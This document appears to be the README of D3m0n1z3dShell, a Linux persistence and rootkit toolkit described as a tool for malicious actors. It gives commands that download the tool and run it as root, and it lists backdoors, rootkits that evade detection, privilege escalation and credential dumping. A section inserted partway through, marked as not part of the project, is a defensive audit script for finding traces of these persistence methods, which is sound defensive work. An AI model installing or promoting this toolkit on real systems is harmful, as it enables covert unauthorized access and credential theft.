Demonized Shell is an advanced tool for persistence in Linux.
Demonized Shell is a sophisticated tool designed for achieving persistence in Linux systems. Its advanced features allow for maintaining unauthorized access over extended periods, making it a potent tool for malicious actors seeking to maintain control over compromised systems.
Install
git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh
One-Liner Install
Download D3m0n1z3dShell with all files:
curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh
Load D3m0n1z3dShell statically (without the static-binaries directory):
sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh
Demonized Features
- Auto Generate SSH keypair for all users
- APT Persistence
- Crontab Persistence
- Systemd User level
- Systemd Root Level
- Bashrc Persistence
- Privileged user & SUID bash
- Modified LKM rootkit, bypassing rkhunter & chkrootkit
- LKM rootkit with file encoder, persistent ICMP backdoor and other features
- ICMP Backdoor
- LD_PRELOAD Setup PrivEsc
- Static binaries for process monitoring, credential dumping, enumeration, trolling and other binaries
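A defender's view of the feature list above, as an added example that is not part of the D3m0n1z3dShell project: a shell audit that looks for generic traces of the listed persistence classes under a given filesystem root. The function names and all paths are assumptions based on standard Linux locations, since the page names no artifact paths.

```sh
#!/bin/sh
# Added defensive example (not part of D3m0n1z3dShell). The paths are standard
# Linux locations; the page names no artifact paths, so none are assumed.
# Usage, as root, after sourcing this file:  audit / 7

# "SUID bash" class: set-uid/set-gid files named like a shell. A renamed copy
# will not match, so also diff the full SUID list against a known-good baseline.
find_suid_shells() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        \( -name 'bash*' -o -name sh -o -name dash -o -name zsh \) 2>/dev/null || true
}

# "LD_PRELOAD" and "Bashrc" classes: libraries forced in through
# /etc/ld.so.preload or through LD_PRELOAD set in shell start-up files.
find_preload() {
    if [ -s "$1/etc/ld.so.preload" ]; then
        awk -v f="$1/etc/ld.so.preload" 'NF { print f ": " $0 }' "$1/etc/ld.so.preload"
    fi
    grep -Hn 'LD_PRELOAD=' "$1"/etc/profile "$1"/etc/bash.bashrc "$1"/etc/environment \
        "$1"/root/.bashrc "$1"/root/.profile \
        "$1"/home/*/.bashrc "$1"/home/*/.profile 2>/dev/null || true
}

# "APT" class: hooks that run a command on every apt/dpkg invocation.
# Legitimate packages install hooks too, so each hit needs a manual look.
find_apt_hooks() {
    grep -HnE 'Pre-Invoke|Post-Invoke|Pre-Install-Pkgs' \
        "$1"/etc/apt/apt.conf "$1"/etc/apt/apt.conf.d/* 2>/dev/null || true
}

# "Crontab", "Systemd" and "SSH keypair" classes: files changed in the last $2 days.
find_recent() {
    find "$1"/etc/crontab "$1"/etc/cron.d "$1"/var/spool/cron "$1"/etc/systemd/system \
        "$1"/root/.config/systemd/user "$1"/home/*/.config/systemd/user \
        "$1"/root/.ssh/authorized_keys "$1"/home/*/.ssh/authorized_keys \
        -type f -mtime "-$2" 2>/dev/null || true
}

audit() {
    root=${1:-/}; days=${2:-7}
    echo "== set-uid/set-gid shells";       find_suid_shells "$root"
    echo "== preload entries";              find_preload "$root"
    echo "== APT hooks";                    find_apt_hooks "$root"
    echo "== changed in last $days days";   find_recent "$root" "$days"
}
```

Because the feature list includes LKM rootkits, which can hide files from a live system, pass the mount point of a read-only disk image on a clean host as the root rather than auditing the running host alone.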
Pending Features
- LD_PRELOAD Rootkit
- Process Injection
- Install via a one-liner, for example: curl github.com/test/test/demonized.sh | bash
- Static D3m0n1z3dShell
- Intercept Syscall Write from a file
- ELF/Rootkit Anti-Reversing Technique
- PAM Backdoor
- rc.local Persistence
- init.d Persistence
- motd Persistence
- Persistence via PHP webshell
- ACL Persistence
Other types of features will come in the future.